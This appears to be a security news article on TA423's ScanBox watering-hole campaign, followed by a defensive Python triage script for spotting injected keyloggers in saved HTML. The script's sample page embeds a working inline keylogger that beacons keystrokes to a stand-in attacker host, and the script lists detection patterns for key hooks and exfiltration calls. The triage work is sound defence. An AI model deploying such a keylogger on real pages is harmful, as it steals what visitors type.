Researchers have discovered that a China-based threat actor tracked as APT TA423 has ramped up its efforts to deliver the ScanBox reconnaissance framework to victims. ScanBox is JavaScript that runs inside the victim's browser when an attacker-controlled or compromised page is visited: it profiles the host and browser and, through plugins such as its keylogger, records what the user types, without dropping any malware to disk. Security researchers identified a watering hole attack, likely conducted by the group, against domestic Australian organizations and offshore energy firms in the South China Sea. The group lured its targets with tailored messages containing links to fake Australian news websites, which served the ScanBox code to anyone who clicked. The campaign is believed to have started in April 2022 and to have run until at least mid-June. The Proofpoint Threat Research Team has released a report detailing the campaign.
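A defender who suspects a page of hosting a ScanBox-style loader usually has a saved copy of the HTML rather than a live browser session. The script below is an added example (not from the page or from Proofpoint's report) showing the first-pass triage such a page gets: collect every script, flag external scripts whose host is not first-party, and flag inline scripts that pair a keystroke hook with an exfiltration primitive. The regex lists are generic watering-hole heuristics, not ScanBox indicators, and the sample HTML, domains and URLs are constructed for the example.

```python
"""Heuristic triage of a saved HTML page for watering-hole style script injection.

Constructed example: the heuristics are generic, and every domain, URL and
script body below is made up for illustration. Nothing here is a ScanBox IOC.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Keystroke capture hooks a browser keylogger needs.
KEYLOG_PATTERNS = [
    r"\bonkey(?:press|down|up)\b",
    r"addEventListener\(\s*['\"]key(?:press|down|up)['\"]",
]
# Primitives used to ship captured data off the page.
EXFIL_PATTERNS = [
    r"\bXMLHttpRequest\b",
    r"\bnavigator\.sendBeacon\b",
    r"new\s+Image\(\)",
    r"\bfetch\(\s*['\"]https?://",
]
# Browser/host profiling typical of a reconnaissance framework.
FINGERPRINT_PATTERNS = [
    r"navigator\.userAgent",
    r"navigator\.plugins",
    r"screen\.(?:width|height)",
    r"navigator\.languages?",
]


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src=...>
        self.inline = []     # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def _hits(text, patterns):
    return [p for p in patterns if re.search(p, text)]


def _is_first_party(host, allowed):
    return host in allowed or any(host.endswith("." + d) for d in allowed)


def triage_page(html, page_url, first_party_domains):
    """Return third-party script URLs and inline scripts that combine
    keystroke capture with an exfiltration primitive."""
    parser = ScriptCollector()
    parser.feed(html)
    allowed = {urlparse(page_url).hostname or ""} | set(first_party_domains)
    findings = {"third_party_scripts": [], "suspicious_inline": []}
    for src in parser.external:
        host = urlparse(src).hostname  # None for relative paths such as /js/app.js
        if host and not _is_first_party(host, allowed):
            findings["third_party_scripts"].append(src)
    for body in parser.inline:
        keylog = _hits(body, KEYLOG_PATTERNS)
        exfil = _hits(body, EXFIL_PATTERNS)
        if keylog and exfil:
            findings["suspicious_inline"].append({
                "keylog": keylog,
                "exfil": exfil,
                "fingerprint": _hits(body, FINGERPRINT_PATTERNS),
            })
    return findings


# Constructed sample: a fake news page with one injected third-party loader
# and one inline keylogger that beacons keystrokes plus the user agent.
SAMPLE_HTML = """<html><head>
<script src="/assets/site.js"></script>
<script src="https://cdn.news-example.test/lib.js"></script>
<script src="https://stats.attacker-example.test/collect.js"></script>
<script>
var buf = '';
document.addEventListener('keydown', function (e) { buf += e.key; });
setInterval(function () {
  new Image().src = 'https://stats.attacker-example.test/k?d=' +
    encodeURIComponent(buf + '|' + navigator.userAgent);
}, 5000);
</script>
</head><body><h1>Headline</h1></body></html>"""

if __name__ == "__main__":
    result = triage_page(SAMPLE_HTML, "https://www.news-example.test/story",
                         {"news-example.test"})
    for src in result["third_party_scripts"]:
        print("third-party script:", src)
    for item in result["suspicious_inline"]:
        print("inline keylogger candidate:", item)
```

The first-party allowlist is the part that needs care in practice: a legitimate site loads plenty of third-party scripts, so the external-script list is a lead to follow, while an inline script that both hooks key events and calls out is a much stronger signal and is worth pulling for manual analysis.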
APT TA423 is also tracked by security researchers as Red Ladon. In the report, Proofpoint assesses with high confidence that the recent activity is attributable to this group, which likely operates out of Hainan Island in China. The group made the news last year when the US Department of Justice indicted it for providing long-standing support to the Hainan Province Ministry of State Security, an entity believed to be responsible for China's cyber espionage, political security, foreign intelligence, and counterintelligence efforts. The full impact of the keylogger campaign is not yet clear; however, the group has in the past succeeded in stealing valuable information and trade secrets from targets, including in the US.
Read More: Watering Hole Attacks Push ScanBox Keylogger